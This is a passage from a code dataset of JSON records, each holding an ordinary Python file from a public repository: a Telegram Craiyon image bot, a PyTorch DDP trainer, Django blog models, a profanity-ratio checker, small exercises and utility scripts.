\"{0}\\t{1}\\n\".format(node, otu)\n #print otu\n #print otu_df[otu_df.index.isin(otu)]\n #print otu_df.sum()\n new_df.loc[node] = otu_df[otu_df.index.isin(otu)].sum()\n\nnew_index_names = []\nfor index in new_df.index:\n for nodeid in node_names:\n newid = re.match(\"\\{([0-9]+)\\}\", nodeid[0])\n if int(newid.group(1)) == int(index):\n if nodeid[1]:\n #new_df.index.rename = nodeid[1]\n new_index_names.append(nodeid[1])\n else:\n new_index_names.append(\"{{{0}}}\".format(index))\n\n\nnew_df.index = new_index_names\nnew_df = new_df.assign(PiePlace=0.5)\nnew_df = new_df.assign(RowSum=new_df.sum(axis=1))\ncol_list = new_df.columns.tolist()\ncol_list = col_list[-2:] + col_list[:-2]\nnew_df = new_df[col_list]\n\n#format database for iTol\nf = open(args.output, 'a')\nf.write(\"DATASET_PIECHART\\n\")\nf.write(\"SEPARATOR TAB\\n\")\nf.write(\"DATASET_LABEL\\tReadPlacement\\n\")\nf.write(\"COLOR\\t#1f2122\\n\")\nf.write(\"FIELD_LABELS\\t\")\nf.write(\"\\t\".join(map(str, list(new_df)[2:])))\nf.write(\"\\n\")\nf.write(\"#I am being a bit lazy here, but I haven't spent the time to generate 'good' colors for the samples. I recommend using the webiste http://tools.medialab.sciences-po.fr/iwanthue/examples.php or http://phrogz.net/css/distinct-colors.html to get a list of colors that you like. They should be tab separated.\\n\")\nf.write(\"FIELD_COLORS\\n\")\nf.write(\"DATA\\n\")\nnew_df.to_csv(f, sep=\"\\t\", header = False)\nf.close()\n","repo_name":"waoverholt/waoverholt.github.io","sub_path":"assets/internal_files/jplace_otuids.py","file_name":"jplace_otuids.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25164085440","text":"import os\nimport sys\n\nimport requests\nimport base64\n\nfrom telegram.ext import Updater, MessageHandler, CommandHandler, Filters\nfrom telegram import InputMediaPhoto\nfrom translator.token import Token\nfrom translator import translate_api\nimport logging\n\n\nlogging.basicConfig(filename='logs/log.info', level='INFO')\nlog = logging.getLogger(__name__)\nlog.addHandler(logging.StreamHandler(stream=sys.stdout))\n\nAPI_KEY = os.getenv('API_KEY')\n# The translation API token is initialized when the bot.py starts.\n# It will be renewed, when needed, in the translate_api.py module.\nIAM_TOKEN = Token()\nIAM_TOKEN = IAM_TOKEN.get_token()\n\n\ndef start(update, context):\n context.bot.send_message(\n chat_id=update.message.chat_id,\n text='Напиши словесное описание того, что хочешь видеть '\n 'нарисованным. Например, \"Ельцин носит латы\".')\n\n\ndef draw(update, context, token=IAM_TOKEN):\n \"\"\"Sends the query to Craiyon and fetches the images\"\"\"\n # Tell the user to be patient.\n context.bot.send_message(chat_id=update.message.chat_id,\n text='Подожди 1-2 минуты.',\n reply_to_message_id=update.message.message_id)\n prompt = update.message.text # The arguments come as a list, and we need a single string.\n log.info(f'The requested prompt is: {prompt}')\n # Send into translation API with the prompt text and initial IAM Token.\n try:\n translated = translate_api.translate(prompt, token)\n except PermissionError:\n token = Token()\n token = token.get_token()\n translated = translate_api.translate(prompt, token)\n log.info(f'It has been translated as: {translated}')\n # Request and response.\n response = requests.post('https://backend.craiyon.com/generate',\n # !!! Now it can respond with 'Too much traffic'. Gotta log the response.\n json={\"prompt\": translated})\n log.info(f\"Craiyon's response: {response}\")\n text = response.json()\n # Response comes as a dict with a list of b64-encoded images {'images':[]}.\n # Decode and send to the same chat. CrAIyon produces 9 images, we use only 3 for aesthetics.\n chat_id = update.message.chat_id\n media_group = []\n for i in range(9):\n image = base64.b64decode(text['images'][i])\n media_unit = InputMediaPhoto(image)\n media_group.append(media_unit)\n context.bot.send_media_group(chat_id=chat_id, media=media_group)\n\n\ndef main():\n updater = Updater(API_KEY)\n dp = updater.dispatcher\n dp.add_handler(CommandHandler('start', start))\n dp.add_handler(MessageHandler(Filters.text, callback=draw))\n updater.start_polling()\n log.info(\"Bot started\")\n updater.idle()\n log.info(\"Bot stopped\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"BorisRouge/CraiyonBot-old-","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"29082145757","text":"N, D = map(int,input().split())\r\n# N, D = map(int, \"7 3\".split())\r\n\r\nfor _ in range(N):\r\n type, inpStr = map(str, input().split())\r\n # type, inpStr = map(str, \"3 3.14150\".split())\r\n if type == \"2\":\r\n index = list(inpStr).index(\".\")+1\r\n try:\r\n # 补0\r\n if len(inpStr) < index + D:\r\n inpStr += \"0\" * (index + D - len(inpStr))\r\n print(inpStr[:index+D])\r\n except:\r\n # 补0\r\n if len(inpStr) < index + D:\r\n inpStr += \"0\" * (index + D - len(inpStr))\r\n print(inpStr)\r\n elif type == \"1\":\r\n inpStrList = list(inpStr)\r\n index = inpStrList.index(\".\")+1\r\n try:\r\n res = float(inpStr[:index + D]) # 输出结果\r\n sishewuru = int(inpStrList[index+D])\r\n if sishewuru >= 5:\r\n jiawei = float(\"0.\"+\"0\"*index+\"1\")\r\n res += jiawei\r\n print(res)\r\n except:\r\n # 补0\r\n if len(inpStr) < index + D:\r\n inpStr += \"0\" * (index + D - len(inpStr))\r\n print(inpStr)\r\n\r\n elif type == \"3\":\r\n inpStrList = list(inpStr)\r\n index = inpStrList.index(\".\") + 1\r\n try:\r\n sishewuru = int(inpStrList[index + D])\r\n res = float(inpStr[:index + D]) # 输出结果\r\n if sishewuru > 5:\r\n jiawei = float(\"0.\" + \"0\" * index + \"1\")\r\n res += jiawei\r\n elif sishewuru == 5:\r\n sishewuruhou = int(inpStrList[index + D+1])\r\n if sishewuruhou != None and sishewuruhou == 0:\r\n #则当有效位最后一位是单数时进位,双数时舍去,即保持最后一位是双数。\r\n houyiwei = int(inpStrList[index + D-1])\r\n if houyiwei%2 == 1:\r\n jiawei = float(\"0.\" + \"0\" * index + \"1\")\r\n res += jiawei\r\n elif sishewuruhou != None and sishewuruhou != 0:\r\n jiawei = float(\"0.\" + \"0\" * index + \"1\")\r\n res += jiawei\r\n print(res)\r\n except:\r\n #补0\r\n if len(inpStr) < index+D:\r\n inpStr += \"0\"*(index+D-len(inpStr))\r\n print(inpStr)","repo_name":"freesan44/LeetCode","sub_path":"PTA_2020_3.py","file_name":"PTA_2020_3.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35724971709","text":"import re\nfrom string import punctuation\n\nTWEETS_FILE_PATH = 'tweets.txt'\nSLURS_FILE_PATH = 'slurs.txt'\n\ndef get_slurs_list(slurs_file_path: str) -> list:\n \"\"\"\n Reads the text file containing all slur words and converts into a list\n\n Parameters:\n - slurs_file_path (str): Path of the slurs file to be read\n \n Returns:\n - A list of all slur words present in the text file\n \"\"\"\n slurs_list = []\n with open(slurs_file_path, 'r') as sf:\n for slur in sf.readlines():\n \n # Remove all whitespace around the word\n slur = slur.strip()\n\n # Convert word to lowercase to avoid case-sensitivity-related issues\n slur = slur.lower()\n\n slurs_list.append(slur)\n\n return slurs_list\n\nSLURS_LIST = get_slurs_list(SLURS_FILE_PATH)\n\ndef get_tweets_list(tweets_file_path: str) -> list:\n \"\"\"\n Reads the text file containing all tweets and converts into a list cleaned and tokenized\n Each raw tweet is passed to the tokenize_raw_tweet function to get the tokens\n\n Parameters:\n - tweets_file_path (str): Path of the tweets file to be read\n \n Returns:\n - A list of list of tokens for all the tweets\n \"\"\"\n tweets = []\n with open(tweets_file_path, 'r') as f:\n for raw_tweet in f:\n tweets.append(raw_tweet)\n \n return tweets\n\ndef tokenize_raw_tweet(raw_tweet: str) -> list:\n \"\"\" \n Clean and tokenize a single tweet\n\n Parameters: \n - raw_tweet (str): The tweet in string form to be tokenized\n \n Returns:\n - A list of tokens extracted from the tweet\n \"\"\"\n\n # Strip redundant whitespace around\n raw_tweet = raw_tweet.strip()\n\n # Remove punctuations \n raw_tweet = raw_tweet.translate(str.maketrans('', '', punctuation))\n\n # Split into tokens of lowercase words\n tokens = raw_tweet.lower().split()\n \n return tokens\n\n\ndef calculate_profanity_ratio(raw_tweet: str) -> float:\n \"\"\"\n \n Calculates the profanity ratio for each tweet after cleaning and tokenizing\n\n Parameters:\n - raw_tweet (str): A string representing a raw tweet\n \n Returns:\n - The profanity ratio for the tweet as a float representing the percentage\n \n \"\"\"\n\n tokens = tokenize_raw_tweet(raw_tweet)\n \n sum = 0\n n = len(tokens)\n\n for word in tokens:\n if word in SLURS_LIST:\n sum += 1\n \n return sum/n\n\ndef main():\n\n tweets_list = get_tweets_list(TWEETS_FILE_PATH)\n\n ratios = []\n\n for tweet in tweets_list:\n ratio = calculate_profanity_ratio(tweet)\n ratios.append(ratio)\n\n \n # Write the results to a new text file\n with open('profanity_results.txt', 'w') as pf:\n for ratio in ratios:\n pf.write(f'{ratio:.2f}\\n')\n\nif __name__ == '__main__':\n main()","repo_name":"prateekb1912/affinity-data-engineer-assignment","sub_path":"profanity_checker/profanity.py","file_name":"profanity.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6085612826","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.parallel import DistributedDataParallel as DDP\n\nfrom .DdpTrainerBase import DdpTrainerBase\n\n\nclass DdpTrainer(DdpTrainerBase):\n\n class HookState:\n\n def __init__(self, cref, process_group):\n r\"\"\"\n A class that holds state information that is needed by the communication hook\n during the training algorithm.\n Args:\n cref (DdpTrainer): reference to the self keyword of the trainer instance\n process_group (ProcessGroup): distributed process group\n \"\"\"\n self.cref = cref\n self.process_group = process_group\n self.batch_number = -1\n\n def get_key(self, bucket_index):\n r\"\"\"\n A method that returns an encoded key that represents the current batch and\n bucket index.\n Args:\n bucket_index (int): index of the bucket being processed in backward\n \"\"\"\n return f\"{self.batch_number},{bucket_index}\"\n\n def next_batch(self):\n r\"\"\"\n A method that increments batch_number by 1.\n \"\"\"\n self.batch_number += 1\n\n def __init__(self, rank, trainer_count, process_group, use_cuda_rpc, server_rref, backend, epochs):\n r\"\"\"\n A trainer that implements a DDP training algorithm using a simple hook that performs allreduce\n using the process_group implementation.\n Args:\n rank (int): worker rank\n trainer_count (int): count of trainer in the world\n process_group (ProcessGroup): distributed process group\n use_cuda_rpc (bool): indicator for CUDA RPC\n server_rref (RRef): remote reference to the server\n backend (str): distributed communication backend\n epochs (int): epoch count for training\n \"\"\"\n super().__init__(rank)\n self.rank = rank\n self.trainer_count = trainer_count\n self.process_group = process_group\n self.use_cuda_rpc = use_cuda_rpc\n self.server_rref = server_rref\n self.backend = backend\n self.epochs = epochs\n\n @staticmethod\n def hook(state, bucket):\n r\"\"\"\n A ddp communication hook that uses the process_group allreduce implementation.\n Args:\n state (object): maintains state during the training process\n bucket (GradBucket): gradient bucket\n \"\"\"\n cref = state.cref\n tensors = [bucket.get_tensor() / state.process_group.size()]\n key = state.get_key(bucket.get_index())\n cref.record_hook_fut_start(key, f\"{cref.backend}_allreduce\")\n fut = state.process_group.allreduce(tensors).get_future()\n\n def callback(fut):\n cref.record_hook_fut_end(key)\n return fut.wait()\n\n return fut.then(callback)\n\n def get_hook(self):\n r\"\"\"\n returns DdpTrainer.hook\n \"\"\"\n return DdpTrainer.hook\n\n def create_ddp_model(self, model):\n r\"\"\"\n A method that creates a ddp_model and hook_state objects.\n It returns the ddp_model and hook_state objects.\n Args:\n model (nn.Module): neural network model\n \"\"\"\n ddp_model = DDP(\n model, device_ids=[self.rank], process_group=self.process_group\n )\n hook_state = self.HookState(self, self.process_group)\n ddp_model.register_comm_hook(hook_state, self.get_hook())\n return ddp_model, hook_state\n\n def create_criterion(self):\n r\"\"\"\n A method that creates a criterion for the training\n algorithm.\n \"\"\"\n return nn.CrossEntropyLoss().cuda(self.rank)\n\n def create_optimizer(self, parameters, lr):\n r\"\"\"\n A method that creates a optimizer for the training\n algorithm.\n Args:\n parameters (iterable): iterable of parameters to optimize\n lr (float): learning rate\n \"\"\"\n return torch.optim.SGD(parameters, lr)\n\n def epoch_key(self, epoch, index):\n r\"\"\"\n A method that returns an encoded key that represents the current epoch and\n iteration index.\n Args:\n epoch (int): epoch index\n index (int): iteration index\n \"\"\"\n return f\"{epoch},{index}\"\n\n def preprocess_data(self, data):\n r\"\"\"\n A method that moves the data from CPU to GPU.\n Args:\n data (list): training examples\n \"\"\"\n for i in range(len(data)):\n data[i][0] = data[i][0].cuda(self.rank)\n data[i][1] = data[i][1].cuda(self.rank)\n return data\n\n def iteration_step(self, ddp_model, criterion, optimizer, hook_state, epoch, index, batch):\n r\"\"\"\n A method that performs an iteration of training.\n Args:\n ddp_model (nn.Module): distributed data parallel model\n criterion (nn.Module): loss function to measure model\n optimizer (optim.Optimizer): updates model parameters\n hook_state (object): ddp communication hook state object\n epoch (int): index of pass through the data\n index (int): iteration number - 1 in current batch\n batch (list): training examples\n \"\"\"\n hook_state.next_batch()\n input, target = batch[0], batch[1]\n self.record_batch_start(self.epoch_key(epoch, index))\n optimizer.zero_grad()\n self.record_forward_start(self.epoch_key(epoch, index))\n out = ddp_model(input)\n self.record_forward_end(self.epoch_key(epoch, index))\n loss = criterion(out, target)\n self.record_backward_start(self.epoch_key(epoch, index))\n loss.backward()\n self.record_backward_end(self.epoch_key(epoch, index))\n optimizer.step()\n self.record_batch_end(self.epoch_key(epoch, index))\n\n def train(self, model, data):\n r\"\"\"\n A method that implements the training algorithm.\n Args:\n model (nn.Module): neural network model\n data (list): training examples\n \"\"\"\n model = model.cuda(self.rank)\n data = self.preprocess_data(data)\n ddp_model, hook_state = self.create_ddp_model(model)\n criterion = self.create_criterion()\n optimizer = self.create_optimizer(ddp_model.parameters(), 1e-4)\n\n for epoch in range(self.epochs):\n for index, batch in enumerate(data):\n self.iteration_step(\n ddp_model, criterion, optimizer, hook_state, epoch, index, batch\n )\n torch.cuda.synchronize(self.rank)\n","repo_name":"xiaoqi25478/Job","sub_path":"PyTorch框架/pytorch-master/benchmarks/distributed/rpc/parameter_server/trainers/DdpTrainer.py","file_name":"DdpTrainer.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"7365490690","text":"import collections.abc as abc\nfrom abc import ABC\n\n\nclass Noticia(ABC):\n def __init__(self,tit,sub,fech,aut,cuer,com,cat):\n self.titulo = tit\n self.subtitulo = sub\n self.fecha = fech\n self.autor = aut\n self.cuerpo = cuer\n self.comentarios = com\n self.categoria = cat\n\nclass Emol(Noticia):\n def __init__(self,tit,sub,fech,aut,cuer,com,cat,subcat):\n super().__init__(tit,sub,fech,aut,cuer,com,cat)\n self.subcategoria = subcat\n\n\nclass La_Tercera(Noticia):\n def __init__(self,tit,sub,fech,aut,cuer,com,cat):\n super().__init__(tit,sub,fech,aut,cuer,com,cat)\n #Agregar Pulso, La Tercera Domingo, La Tercera PM\n","repo_name":"TheRaai/ProyectoLP","sub_path":"noticias.py","file_name":"noticias.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15194657609","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\ndef serve_layout():\n\n\treturn [\n\n\thtml.Br(),\n\thtml.Br(),\n\thtml.Br(),\n\n\t\tdbc.Row([\n\t\t\tdbc.Col('', width=2),\n\t\t\tdbc.Col(\n\t\t\t\thtml.Img(src='web-development2.png', style={ 'height': '300px'})\n\t\t\t, width=3),\n\n\n\t\t\tdbc.Col([\n\n\t\t\t\thtml.Br(),\n\n\t\t\t\thtml.Div('''QuantViews''', style={'font-size': 48, \n\t\t\t\t\t'font-weight': 'bold', 'color': '#2FC086'}),\n\n\t\t\t\thtml.Div('''Financial Apps for Smarter Investing''', style={'font-size': 24, \n\t\t\t\t\t'font-weight': 'bold', 'color': '#2FC086'}),\n\n\t\t\t\thtml.Div('''By Joey Bortfeld''', style={'font-size': 18, \n\t\t\t\t\t'font-weight': '', 'color': '#2FC086'}),\n\t\t\t])\n\t\t\t,\t\n\t\t]),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\t\thtml.Div('''In my day job I'm a \"quantitative analyst\" covering the corporate bond markets. \n\t\t\tWill Tesla by able to pay back the $10 billion in debt it has borrowed? What sectors are increasing their cash holdings?\n\t\t\tIs there a way to identify characteristics that are associated with outsized returns?''', \n\t\t\tstyle={'text-align': 'left', 'margin-left': '5%', 'font-size': 18}),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\t\thtml.Div('''Now I want to make tools that are relevant for everyday people and that will help them\n\t\t\tnavigate their financial life.''', style={'text-align': 'left', 'margin-left': '5%', 'font-size': 18}),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\t\t\n\t\thtml.Div('''Questions or suggestions? Please write me at quantviews@gmail.com''',\n\t\t\tstyle={'text-align': 'left', 'margin-left': '5%', 'font-size': 18, 'color': '#2FC086'}),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\t\thtml.Div(\n\t\t\thtml.A('''This website and all its analysis is open-source. See here''', \n\t\t\thref='https://github.com/jbortfeld/QuantView')\n\t\t, style={'text-align': 'left', 'margin-left': '5%', 'font-size': 18, 'color': '#2FC086'}),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\n\n\n\t]\n\nlayout=serve_layout","repo_name":"jbortfeld/QuantView","sub_path":"apps/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"73486114772","text":"import numpy as np\n\ndef get_column(table, header, col_name):\n index = header.index(col_name)\n new_table = []\n for row in table:\n new_table.append(row[index])\n return new_table\n\ndef get_frequencies (table, header, col_name):\n col = get_column(table,header,col_name)\n col.sort() # inplace_sort\n\n values = [] #75,76,77\n count = [] #2,1,1\n\n for value in col:\n if value not in values:\n values.append(value)\n count.append(1)\n else:\n count[-1] += 1\n\n return values,count\n \n\ndef main():\n header = [\"CarName\", \"ModelYear\", \"MSRP\"]\n msrp_table = [[\"ford pinto\", 75, 2769],\n [\"toyota corolla\", 75, 2711],\n [\"ford pinto\", 76, 3025],\n [\"toyota corolla\", 77, 2789]]\n msrps = get_column(msrp_table, header, \"MSRP\")\n print(msrps)\n\n modelyear_values, model_year_count = get_frequencies(msrp_table, header, \"ModelYear\")\n print(modelyear_values,model_year_count)\n\n\n msrp_mean = sum(msrps)/len(msrps)\n print(\"mean:\", msrp_mean)\n\n msrp_mid = (min(msrps)+max(msrps))/2\n print(\"mid:\", msrp_mid)\n\n squared_mean_deviations = [(msrp-msrp_mean) ** 2 for msrp in msrps]\n variance = sum(squared_mean_deviations)/len(squared_mean_deviations)\n standard_dev = variance ** (1/2)\n print(\"standar_dev:\", standard_dev)\n\n\n assert np.isclose(standard_dev,np.std(msrps))\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"dpmacisaac/HelloWorldPersonalGH","sub_path":"notes/main_data_prep.py","file_name":"main_data_prep.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25337689968","text":"import json\nfrom datetime import datetime\n\nfrom stats import get_user_session_stats\n\n\ndef lambda_handler(event, context):\n try:\n year = event[\"queryStringParameters\"][\"year\"]\n except Exception as ex:\n print(f\"Could not get year: {ex}\")\n year = datetime.now().year\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"content-type\": \"application/json\",\n \"Access-Control-Allow-Origin\": '*'\n },\n \"body\": json.dumps({\n \"data\": get_user_session_stats(year)\n }),\n }\n","repo_name":"Lethabo-Kekana/chatbot-backend-system","sub_path":"src/GetSessionStats/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12404694516","text":"from django.db import models\nfrom django.core.validators import RegexValidator\nfrom django.core.exceptions import ValidationError\nfrom tinymce import models as tinymce_models\nfrom django.contrib.auth.base_user import BaseUserManager\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom django.utils.translation import ugettext_lazy\nfrom django.utils import timezone\nfrom django.contrib.auth.password_validation import validate_password\nfrom string import printable\n\n# Create your models here.\nclass Tag(models.Model):\n class Meta:\n verbose_name = 'برچسب'\n verbose_name_plural = 'برچسب ها'\n\n name = models.CharField(\n verbose_name='برچسب',\n max_length=100,\n )\n accept_by_admin = models.BooleanField(\n verbose_name='برچسب تایید شده است',\n default=False,\n )\n \n def __str__(self):\n return self.name\n\nclass Category(models.Model):\n class Meta:\n verbose_name = 'دسته بندی'\n verbose_name_plural = 'دسته بندی ها'\n\n name = models.CharField(\n verbose_name='دسته بندی',\n max_length=100,\n )\n\n supercategory = models.ForeignKey(\n 'Category',\n verbose_name='سر دسته',\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n )\n\n def __str__(self):\n return self.name\n\nclass Post(models.Model):\n class Meta:\n verbose_name = 'پست'\n verbose_name_plural = 'پست ها'\n permissions = [\n ('accept_post', 'تایید کردن پست'),\n ]\n\n title = models.CharField(\n verbose_name='عنوان',\n max_length=200,\n )\n text = tinymce_models.HTMLField(\n verbose_name='متن',\n )\n safe_text = models.TextField(\n verbose_name='متن بدون تگ html',\n )\n image = models.ImageField(\n verbose_name='تصویر پست',\n blank=True,\n null=True,\n upload_to='post_imgs'\n )\n show_post = models.BooleanField(\n verbose_name='نمایش عمومی پست',\n default=True,\n )\n post_send_time = models.DateTimeField(\n verbose_name='زمان ارسال پست',\n )\n accept_by_admin = models.BooleanField(\n verbose_name='پست تایید شده است',\n default=False,\n )\n tags = models.ManyToManyField(\n Tag,\n verbose_name='برچسب ها',\n through='Post_tag',\n )\n categories = models.ForeignKey(\n Category,\n on_delete=models.CASCADE,\n verbose_name='دسته بندی ها',\n )\n post_likes = models.ManyToManyField(\n 'User',\n verbose_name='پسندیدم',\n blank=True,\n related_name='post_like',\n through='Post_rating',\n )\n user = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n verbose_name='کاربر',\n related_name='post_user',\n )\n\n def __str__(self):\n return self.title\n\nclass Post_tag(models.Model):\n class Meta:\n verbose_name = 'برچسب پست'\n verbose_name_plural = 'برچسب های پست'\n\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n tag = models.ForeignKey('Tag', on_delete=models.CASCADE)\n\n def __str__(self):\n return f'{self.post} : {self.tag}'\n\nclass Post_rating(models.Model):\n class Meta:\n verbose_name = 'پسندیدن/نپسندیدن پست'\n verbose_name_plural = 'پسندیدن/نپسندیدن پست ها'\n constraints = [\n models.UniqueConstraint(fields=['post','user'], name='postrates'),\n ]\n\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n user = models.ForeignKey('User', on_delete=models.CASCADE)\n positive = models.BooleanField(\n verbose_name='پسندیدن؟'\n )\n\n def __str__(self):\n if self.positive:\n return f'{self.user.username} ' + 'پسندید ' + 'پست ' + f'\"{self.post}\"'\n else:\n return f'{self.user.username} ' + 'نپسندید ' + 'پست ' + f'\"{self.post}\"'\n\nclass Comment(models.Model):\n class Meta:\n verbose_name = 'نظر'\n verbose_name_plural = 'نظرات'\n permissions = [\n ('accept_comment', 'تایید کردن نظر'),\n ]\n ordering = ['-comment_send_time']\n \n text = models.CharField(\n verbose_name='متن',\n max_length=500,\n )\n accept_by_admin = models.BooleanField(\n verbose_name='کامنت تایید شده است',\n default=False,\n )\n comment_send_time = models.DateTimeField(\n verbose_name='زمان ارسال نظر',\n )\n post = models.ForeignKey(\n Post,\n on_delete=models.CASCADE,\n verbose_name='پست',\n )\n user = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n verbose_name='کاربر',\n related_name='comment_user',\n )\n comment_likes = models.ManyToManyField(\n 'User',\n verbose_name='پسندیدم',\n blank=True,\n related_name='comment_like',\n through='Comment_rating',\n )\n\n def __str__(self):\n return str(self.text)[:50] + (len(self.text)>50)*'...'\n\nclass Comment_rating(models.Model):\n class Meta:\n verbose_name = 'پسندیدن/نپسندیدن نظر'\n verbose_name_plural = 'پسندیدن/نپسندیدن نظرات'\n constraints = [\n models.UniqueConstraint(fields=['comment','user'], name='commentrates'),\n ]\n\n comment = models.ForeignKey('Comment', on_delete=models.CASCADE)\n user = models.ForeignKey('User', on_delete=models.CASCADE)\n positive = models.BooleanField(\n verbose_name='پسندیدن؟'\n )\n\n def __str__(self):\n if self.positive:\n return f'{self.user.username} ' + 'پسندید ' + 'نظر ' + f'\"{self.comment}\"'\n else:\n return f'{self.user.username} ' + 'نپسندید ' + 'نظر ' + f'\"{self.comment}\"'\n\nclass CustomUserManager(BaseUserManager):\n '''\n Custom user model manager where username is the unique identifiers for authentication\n '''\n def create_user(self, username, password, **extra_fields):\n '''\n Create and save a User with the given username and password.\n '''\n if not username:\n raise ValueError(ugettext_lazy('The Username must be set'))\n user = self.model(username=username, **extra_fields)\n user.set_password(password)\n user.save()\n return user\n\n def create_superuser(self, username, password, **extra_fields):\n '''\n Create and save a SuperUser with the given username and password.\n '''\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n extra_fields.setdefault('is_active', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError(ugettext_lazy('Superuser must have is_staff=True.'))\n if extra_fields.get('is_superuser') is not True:\n raise ValueError(ugettext_lazy('Superuser must have is_superuser=True.'))\n return self.create_user(username, password, **extra_fields)\n\nclass User(AbstractBaseUser, PermissionsMixin):\n class Meta:\n verbose_name = 'کاربر'\n verbose_name_plural = 'کاربران'\n\n def validate_username_custom(name):\n if not all([(lambda x: x in printable[:62])(x) for x in name]) or len(str(name)) < 4:\n raise ValidationError(\n ugettext_lazy('%(name)s نمی تواند یک نام کاربری باشد. نام کاربری باید حداقل 4 کاراکتر باشد و فقط می تواند شامل حروف انگلیسی و اعداد باشد.'),\n params={'name': name},\n )\n\n username = models.CharField(\n verbose_name='نام کاربری',\n max_length=40,\n unique=True,\n primary_key=True,\n validators=[validate_username_custom]\n )\n first_name = models.CharField(\n verbose_name='نام',\n max_length=100,\n )\n last_name = models.CharField(\n verbose_name='نام خانوداگی',\n max_length=100,\n )\n phone_regex = RegexValidator(\n regex=r'\\b[0]{1}[9]{1}[0-9]{9}\\b',\n message=\"شماره تلفن همراه باید به فرمت 09123456789 باشد\",\n )\n phone = models.CharField(\n verbose_name='تلفن همراه',\n validators=[phone_regex],\n max_length=17,\n blank=True,\n null=True,\n )\n email = models.EmailField(\n verbose_name='ایمیل',\n unique=True,\n )\n birth_day = models.DateField(\n verbose_name='تاریخ تولد',\n blank=True,\n null=True,\n )\n image = models.ImageField(\n verbose_name='تصویر',\n blank=True,\n null=True,\n upload_to='user_imgs'\n )\n date_joined = models.DateTimeField(\n verbose_name='زمان ثبت نام',\n blank=True,\n default=timezone.now,\n )\n is_staff = models.BooleanField(\n verbose_name='کارمند است؟',\n default=False,\n )\n is_active = models.BooleanField(\n verbose_name='فعال است؟',\n default=True,\n )\n is_superuser = models.BooleanField(\n verbose_name='ابرکاربر',\n default=False,\n )\n follow = models.ManyToManyField(\n 'User',\n verbose_name='دنبال کنندگان',\n blank=True,\n through='Follow',\n )\n USERNAME_FIELD = 'username'\n\n objects = CustomUserManager()\n\n def __str__(self):\n return self.username + ' : ' + self.first_name + \" \" + self.last_name\n\nclass Follow(models.Model):\n class Meta:\n verbose_name = 'ارتباطات کاربران'\n verbose_name_plural = 'ارتباط کاربران'\n\n follower = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n related_name='follower',\n )\n followed = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n related_name='followed',\n )\n","repo_name":"mmshojaefar/Blog","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10196,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18795658391","text":"import re\n\n# A regular expression pattern that matches a sequence of digits\npattern = r'\\d+'\n\n# Some sample text to match against\ntext = 'The answer is 42.'\n\n# Use the search function from the re module to find the first match\nmatch = re.search(pattern, text)\n\n# Print the matched string\nprint(match.group())\n","repo_name":"Daniellem97/retest","sub_path":"retest.py","file_name":"retest.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29106606072","text":"#!/usr/bin/env python2\n\nfrom __future__ import print_function\nimport argparse, os, random, sys\nfrom util import *\n\ndef point(base, length, cryfsm='cryfsm', fsmevade='fsmevade'):\n secret = random.randint(0, base ** length - 1)\n repr = dary_repr(secret, base, length)\n base_2_len = len(str_base(base-1, 2))\n inp = ''.join([dary_repr(int(i, base=base), 2, base_2_len) for i in repr])\n lst = []\n for i in xrange(length):\n for b in xrange(base_2_len):\n lst.append('\"%d\"' % i)\n str = '[' + ','.join(lst) + ']'\n tmp = 'point-%d-%d-tmp.json' % (base, length)\n fname = 'point-%d-%d.json' % (base, length)\n lst = [cryfsm, 'util.cry', '-e', \"(!=) 0b%s\" % inp,\n '-v', \"adjacentConstantBase `{base=%d}\" % base, '-g',\n \"%s\" % str, '-o', tmp]\n try:\n run(lst)\n except OSError:\n print(\"error: running cryfsm failed\")\n sys.exit(1)\n lst = [fsmevade, '-i', tmp, '-o', fname, 'True']\n try:\n run(lst)\n except OSError:\n print(\"error: running fsmevade failed\")\n 